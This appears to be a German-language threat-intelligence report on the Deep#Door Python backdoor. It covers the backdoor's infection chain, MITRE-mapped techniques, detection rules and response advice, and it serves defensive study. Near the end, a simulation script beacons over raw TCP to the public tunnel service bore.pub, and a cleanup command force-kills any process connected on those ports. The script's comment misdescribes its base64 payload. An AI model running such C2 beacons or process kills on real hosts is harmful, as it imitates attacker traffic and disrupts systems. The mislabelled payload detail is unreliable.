Folgen 
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht untersucht Deep#Door, eine heimliche, auf Python basierende Backdoor, die über einen verschleierten Batch-Loader geliefert wird, der seine bösartige Nutzlast zur Laufzeit einbettet und rekonstruiert. Die Malware nutzt einen öffentlichen TCP-Tunneldienst für die Steuerungs- und Kontrollkommunikation, richtet mehrere Persistenzmechanismen ein, schwächt Windows-Sicherheitskontrollen und unterstützt umfassende Überwachungs- und Anmeldeinformationsdiebstahlaktivitäten. Außerdem führt sie detaillierte Umweltüberprüfungen durch, um Sandboxes und Analysten zu entgehen, während sie sich auf API-Patching im Arbeitsspeicher verlässt, um während der Ausführung verborgen zu bleiben.
Untersuchung
Securonix Forscher kartierten die gesamte Infektionskette vom initialen Batch-Skript bis zur Nutzlast-Extraktion, Rekonstruktion und Ausführung des finalen Python RAT. Ihre Analyse identifizierte den Missbrauch von bore.pub zum Tunneln, dynamisch generierte Ports und eine benutzerdefinierte Authentifizierungssequenz, die für den Betreiberzugang verwendet wird. Der Bericht enthielt auch eine detaillierte Beschreibung der Methoden zur Umgehung von Verteidigungsmaßnahmen, Persistenztechniken, Systementsdeckungsroutinen und dem Verhalten der Datenexfiltration.
Abmilderung
Verteidiger sollten die Skriptausführung genau überwachen, PowerShell-Protokollierung aktivieren, unerlaubte Änderungen an Microsoft Defender und Firewall-Einstellungen erkennen und Start-Einträge, Run-Schlüssel und zugehörige Persistenzorte überprüfen. Die Netzwerküberwachung sollte sich auch auf ausgehende Verbindungen zu bore.pub und ungewöhnliche Aktivitäten auf hohen Ports konzentrieren. EDR-Tools, die in der Lage sind, API-Patching und Manipulation im Arbeitsspeicher zu erkennen, können die Sichtbarkeit dieser Bedrohung weiter verbessern.
Reaktion
Wenn Deep#Door Aktivität erkannt wird, sollte der betroffene Endpunkt sofort isoliert, der bösartige Python-Prozess beendet, alle Persistenzmechanismen einschließlich Startskripten, Run-Schlüsseln und WMI-Abonnements entfernt und modifizierte Defender- und Protokollierungseinstellungen wiederhergestellt werden. Sicherheitsteams sollten auch eine Speicher- und forensische Analyse durchführen, um versteckte Implantate zu identifizieren und das Ausmaß des Anmeldedaten-Diebstahls zu bewerten, während die Netzwerkkommunikation zu bore.pub.
„graph TB
%% Class Definitions Section
classDef action fill:#99ccff
classDef tool fill:#ffcc99
classDef malware fill:#ff9999
classDef process fill:#ccccff
%% Nodes Definitions
action_user_execution[„Aktion – T1204 Benutzerausführung: Opfer führt bösartige Batch-Datei install_obf.bat aus“]
class action_user_execution action
tool_batch_file[„Werkzeug – Name: install_obf.bat
Beschreibung: Batch-Skript, das den Loader startet“]
class tool_batch_file tool
action_obfuscation[„Aktion – T1027 Verschleierte Dateien oder Informationen: Extrahiert Base64/XOR-codierte Python-Nutzlast (svc.py) über selbstreferenzierende PowerShell-RegEx“]
class action_obfuscation action
tool_powershell[„Werkzeug – Name: PowerShell
Beschreibung: Wird verwendet, um die Batch-Datei zu parsen und die eingebettete Nutzlast zu dekodieren“]
class tool_powershell tool
tool_python[„Werkzeug – Name: Python
Beschreibung: Führt die dekodierte svc.py-Nutzlast aus“]
class tool_python tool
action_defense_evasion_disable[„Aktion – T1562.001 Deaktivieren oder Modifizieren von Werkzeugen / T1562.004 Deaktivieren oder Modifizieren der Systemfirewall / T1562.008 Deaktivieren oder Modifizieren von Cloud-Logs: Deaktiviert Windows Defender, PowerShell-Protokollierung, SmartScreen und Firewall-Protokollierung“]
class action_defense_evasion_disable action
tool_setmp[„Werkzeug – Name: Set-MpPreference
Beschreibung: PowerShell-Cmdlet zur Änderung der Defender-Einstellungen“]
class tool_setmp tool
tool_netsh[„Werkzeug – Name: netsh advfirewall
Beschreibung: Modifiziert Windows-Firewall-Regeln und -Protokollierung“]
class tool_netsh tool
action_indicator_removal[„Aktion – T1070.001 Windows-Ereignisprotokolle löschen und T1070.006 Zeitstempel ändern: Stoppt und löscht EventLog/Sysmon-Dienste und ändert Dateizeitstempel“]
class action_indicator_removal action
action_persistence_runkey[„Aktion – T1547.001 Registrierungs-Run-Schlüssel/Autostart-Ordner und T1053 Geplanter Task/Job: Legt SystemServices.vbs im Autostart-Ordner ab, erstellt Run-Schlüssel und eine geplante Task als Fallback“]
class action_persistence_runkey action
tool_vbs_startup[„Werkzeug – Name: SystemServices.vbs
Beschreibung: VBS-Skript im %APPDATA%MicrosoftWindowsStartmenüProgrammeAutostart“]
class tool_vbs_startup tool
action_credential_access[„Aktion – T1003 Betriebssystem-Anmeldeinformations-Dumping, T1552.004 Private Schlüssel, T1552.001 Anmeldeinformationen in Dateien, T1555 Passwortspeicher, T1555.005 Passwort-Manager: Sammelt Browser-Passwörter, Windows Anmeldeinformations-Manager, SSH-Schlüssel, Cloud-Token“]
class action_credential_access action
action_collection[„Aktion – T1056.001 Tastenanschläge aufzeichnen, T1113 Bildschirmaufnahme, T1125 Videoaufnahme, T1123 Audioaufnahme, T1115 Zwischenablage-Daten: Nimmt Tastenanschläge, Bildschirmfotos, Webcam-Videos, Mikrofon-Audio und Zwischenablage auf“]
class action_collection action
action_discovery[„Aktion – T1082 System-Informationsentdeckung, T1518 Softwareentdeckung, T1057 Prozessentdeckung, T1046 Netzwerkdienst-Entdeckung, T1018 Fernsystem-Entdeckung, T1526 Cloud-Dienst-Entdeckung: Sammelt Betriebssystem-, Hardware-, Software-, Prozess-, Netzwerk- und Cloud-Konfigurationsdaten“]
class action_discovery action
action_defense_evasion_reflective[„Aktion – T1620 Spiegelnde Code-Ausführung und T1497.003 Virtualisierungs-/Sandbox-Evasion: Zeitbasiert: Erkennt Debugger, virtuelle Maschinen und Sandbox-Eigenschaften und bricht die Ausführung ab“]
class action_defense_evasion_reflective action
action_c2_tunneling[„Aktion – T1572 Protokoll-Tunneling: Errichtet verschlüsselten Tunnel über öffentlichen Dienst bore.pub, führt dynamisches Port-Scannen und Challenge-Response-Authentifizierung durch“]
class action_c2_tunneling action
action_exfiltration[„Aktion – T1041 Exfiltration über C2-Kanal und T1048.002 Exfiltration über alternatives Protokoll: Asymmetrisch verschlüsselt Non-C2: Sendet gesammelte Daten durch den getunnelten Kanal“]
class action_exfiltration action
action_impact_forkbomb[„Aktion – T1499.002 Dienstauslastung-Überlastung: Führt eine Gabelbombe aus, um Systemressourcen zu verbrauchen“]
class action_impact_forkbomb action
%% Connections showing attack flow
action_user_execution –>|führt aus| tool_batch_file
tool_batch_file –>|enthält| action_obfuscation
action_obfuscation –>|verwendet| tool_powershell
tool_powershell –>|decodiert und startet| tool_python
tool_python –>|führt aus| action_defense_evasion_disable
action_defense_evasion_disable –>|verwendet| tool_setmp
action_defense_evasion_disable –>|verwendet| tool_netsh
action_defense_evasion_disable –>|führt zu| action_indicator_removal
action_indicator_removal –>|geht voraus| action_persistence_runkey
action_persistence_runkey –>|legt ab| tool_vbs_startup
action_persistence_runkey –>|ermöglicht| action_credential_access
action_credential_access –>|ermöglicht| action_collection
action_collection –>|liefert Daten an| action_discovery
action_discovery –>|unterstützt| action_defense_evasion_reflective
action_defense_evasion_reflective –>|etabliert| action_c2_tunneling
action_c2_tunneling –>|trägt| action_exfiltration
action_exfiltration –>|löst aus| action_impact_forkbomb
„
Angriffsfluss
Erkennungen
Mögliche Persistenzpunkte [ASEPs – Software/NTUSER Hive] (über registry_event)
Ansicht
Verdächtige PowerShell-Strings (über cmdline)
Ansicht
Verdächtige .NET-Klassen/Methoden-Aufrufe von PowerShell-Befehlszeile (über process_creation)
Ansicht
Mögliche Remote-Systementdeckung oder Verbindungs-Check (über cmdline)
Ansicht
Mögliche Konto- oder Gruppenauflistung/-manipulation (über cmdline)
Ansicht
Mögliche Nutzung von Timeout zur verzögerten Ausführung (über cmdline)
Ansicht
LOLBAS WScript / CScript (über process_creation)
Ansicht
Echtzeit-Überwachung von Windows Defender deaktivieren und andere Einstellungen ändern (über cmdline)
Ansicht
Verdächtige PowerShell-Strings (über powershell)
Ansicht
Verdächtige Änderungen an den Windows Defender-Einstellungen (über powershell)
Ansicht
Verdächtige Binärdateien/Skripte im Autostart-Ort (über file_event)
Ansicht
IOCs (HashSha256) zur Erkennung: Deep#Door Stealer: Heimliche Python-Backdoor und Anmeldeinformations-Hacker, der Tunneling, mehrschichtige Persistenz und Überwachungsfähigkeiten im Arbeitsspeicher nutzt
Ansicht
Erkennung von C2-Kommunikation über öffentlichen TCP-Tunneldienst [Windows-Netzwerkverbindung]
Ansicht
PowerShell-Befehl zur Extraktion der eingebetteten Python-Nutzlast [Windows PowerShell]
Ansicht
Erkennung der Bereitstellung der heimlichen Python-Backdoor Deep#Door [Windows-Prozesserstellung]
Ansicht
Erkennung des Einsatzes des TCP-Tunnelingdienstes bore.pub für C2-Kommunikation [Windows-Netzwerkverbindung]
Ansicht
Echtzeit- und Verhaltensüberwachung von Windows Defender deaktiviert [Windows PowerShell]
Ansicht
Ausführung des verschleierten Batch-Skripts Deep#Door [Windows-Prozesserstellung]
Ansicht
PowerShell-Befehl zur Deaktivierung von Windows Defender-Funktionen [Windows PowerShell]
Ansicht
Erkennung der Ausführung der heimlichen Python-Backdoor Deep#Door [Windows-Prozesserstellung]
Ansicht
Erkennung der heimlichen C2-Kommunikation über bore.pub [Windows-Netzwerkverbindung]
Ansicht
Erkennung des Deep#Door-Stealers unter Verwendung von PowerShell und Firewall-Manipulation [Windows PowerShell]
Ansicht
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Vorflugtest muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die zur Auslösung der Erkennungsregel ausgelegt ist. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffs-Erzählung & Befehle:
Ein Angreifer, der auf dem Windows-Host mit niedrigen Privilegien Fuß gefasst hat, möchte einen heimlichen C2-Kanal über die öffentlich bekannte
bore.pubvom Deep#Door genutzte Tunneldienst einrichten. Um sich mit legitimen Datenverkehr zu vermischen, wählt der Angreifer einen Port aus dem Bereich 41.234-41.243 (vom Malware ausgewählt) und verwendet PowerShell’sSystem.Net.Sockets.TcpClientKlasse, um eine rohe TCP-Verbindung zu öffnen. Die Verbindung wird für kurze Zeit im Leerlauf gehalten, um einen Herzschlag zu simulieren, bevor ein kleines base-64-codiertes Beacon übertragen wird. -
Regressionstest-Skript:
# Simuliere Deep#Door C2-Beacon zu bore.pub auf einem zufälligen Port innerhalb des überwachten Bereichs $domain = 'bore.pub' $port = Get-Random -Minimum 41234 -Maximum 41244 # Obergrenze ist exklusiv try { Write-Host "Verbindung zu $domain:$port wird aufgebaut ..." $client = New-Object System.Net.Sockets.TcpClient $client.Connect($domain, $port) $stream = $client.GetStream() # Minimaler Beacon-Nutzlast (z.B., ein base64-codiertes "ping") $payload = [System.Text.Encoding]::ASCII.GetBytes('cGlja2V0') $stream.Write($payload,0,$payload.Length) Write-Host "Beacon gesendet. Verbindung wird für 5 Sekunden gehalten..." Start-Sleep -Seconds 5 } catch { Write-Error "Verbindung fehlgeschlagen: $_" } finally { if ($stream) { $stream.Close() } if ($client) { $client.Close() } Write-Host "Verbindung geschlossen." } -
Aufräum-Befehle:
# Keine persistierenden Artefakte; sicherstellen, dass keine verbleibenden TCP-Verbindungen bestehen Get-NetTCPConnection -RemotePort 41234-41243 -State Established | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force } Write-Host "Aufräumen abgeschlossen."
Ende des Berichts